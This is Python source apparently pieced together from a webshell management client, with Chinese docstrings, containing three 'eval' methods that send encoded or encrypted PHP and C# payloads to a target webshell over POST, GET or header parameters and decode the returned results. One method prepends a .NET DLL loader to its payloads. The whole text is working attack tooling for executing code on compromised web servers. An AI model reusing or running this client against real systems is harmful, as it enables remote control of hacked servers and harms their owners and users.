def eval(self, payload: PHPPayload) -> EvalResult:
'''执行payload并获取返回结果'''
password_type = self.options.password_type.upper()
payload_param_name = utils.randomstr(8)
payload = base64.b64encode(payload.code).decode()
trans_payload = PHPPayload(
'transfer.php',
payload_param_name=payload_param_name).code.decode()
data = {payload_param_name: payload}
headers = {}
query = {}
if password_type == 'POST':
data[self.options.password] = trans_payload
elif password_type == 'GET':
query[self.options.password] = trans_payload
elif password_type == 'HEADER':
trans_payload = trans_payload.replace('\r',
'').replace('\n',
'') # 头部传输时消除换行
headers.update({self.options.password: trans_payload})
result = EvalResult()
try:
with self.opener.reuqest(self.options.target,
data=data,
headers=headers,
params=query,
timeout=self.options.timeout) as f:
data = f.read()
data = json.loads(data)
if not self._error_handler(data, result):
return result
data = base64.b64decode(data['data'].encode()).decode(
self.options.encoding, 'ignore')
result.data = data
return result
except json.JSONDecodeError as e:
err = self.EvalError(e.__class__.__name__, e.msg, False, False)
result.add_error_info(err)
if self.options.verbose > 0:
logger.error(err)
print(f"Error data: {data}")
except HttpException as e:
err = self.EvalError(
'HttpException',
f"{e.msg};Response: {e.response.read().decode(self.options.encoding, 'ignore')}",
False, False)
result.add_error_info(err)
if self.options.verbose > 1:
logger.error(err)
except Exception as e:
err = self.EvalError(e.__class__.__name__, str(e), False, False)
result.add_error_info(err)
if self.options.verbose > 0:
logger.error(err)
return result
def _error_handler(self, error: dict, result: EvalResult)-> bool:
'''处理webshell返回的错误信息
'''
if error['code'] != 1:
for msg in error['msg']:
err = self.EvalError(msg[0], base64.b64decode(msg[1].encode()).decode(self.options.encoding, 'ignore'),
True if error['code'] == 0 or msg[2] else False, True)
result.add_error_info(err)
if err.iswarning and self.options.verbose > 1:
logger.warning(err)
elif not err.iswarning and self.options.verbose > 0:
logger.error(err)
if error['code'] == -1:
return False
return True
def eval(self, payload: CSharpPayload) -> EvalResult:
'''执行payload并获取返回结果'''
trans = b''
with open(
os.path.join(
os.path.dirname(__file__), 'temp.new.dll' if
self.options.new_version else 'temp.old.dll'), 'rb') as f:
trans = f.read()
payload = trans + b"gyhnb" + payload.code
payload = self._encrypt(payload)
headers = {}
if self.options.extra_assemblys:
headers['Token'] = base64.b64encode(
self._encrypt(self._generate_extra_assemblys_string().encode())
).decode()
result = EvalResult()
try:
with self.opener.post(self.options.target,
payload,
headers,
timeout=self.options.timeout) as f:
data = f.read()
data = base64.b64decode(data)
data = self._decrypt(data)
data = json.loads(data)
if not self._error_handler(data, result):
return result
data = base64.b64decode(data['data'].encode()).decode(
self.options.encoding, 'ignore')
result.data = data
return result
except (EncryptFailedError, DecryptFailedError) as e:
err = self.EvalError(e.__class__.__name__, str(e), False, False)
result.add_error_info(err)
if self.options.verbose > 0:
logger.error(err)
print(f"Error data: {data[:100]}")
except HttpException as e:
err = self.EvalError(
'HttpException',
f"{e.msg};Response: {e.response.read().decode(self.options.encoding, 'ignore')}",
False, False)
result.add_error_info(err)
if self.options.verbose > 1:
logger.error(err)
except BaseException as e:
err = self.EvalError(e.__class__.__name__, str(e), False, False)
result.add_error_info(err)
if self.options.verbose > 0:
logger.error(err)
return result
def eval(self, payload: PHPPayload) -> EvalResult:
'''执行payload并获取返回结果'''
payload = self._encrypt(payload.code)
payload = base64.b64encode(payload).decode()
data = {utils.randomstr(8): payload}
result = EvalResult()
try:
with self.opener.post(self.options.target,
data,
timeout=self.options.timeout) as f:
data = f.read()
data = self._decrypt(data)
data = json.loads(data)
if not self._error_handler(data, result):
return result
data = base64.b64decode(data['data'].encode()).decode(
self.options.encoding, 'ignore')
result.data = data
return result
except (EncryptFailedError, DecryptFailedError) as e:
err = self.EvalError(e.__class__.__name__, str(e), False, False)
result.add_error_info(err)
if self.options.verbose > 0:
logger.error(err)
print(f"Error data: {data[:100]}")
except HttpException as e:
err = self.EvalError(
'HttpException',
f"{e.msg};Response: {e.response.read().decode(self.options.encoding, 'ignore')}",
False, False)
result.add_error_info(err)
if self.options.verbose > 1:
logger.error(err)
except Exception as e:
err = self.EvalError(e.__class__.__name__, str(e), False, False)
result.add_error_info(err)
if self.options.verbose > 0:
logger.error(err)
return result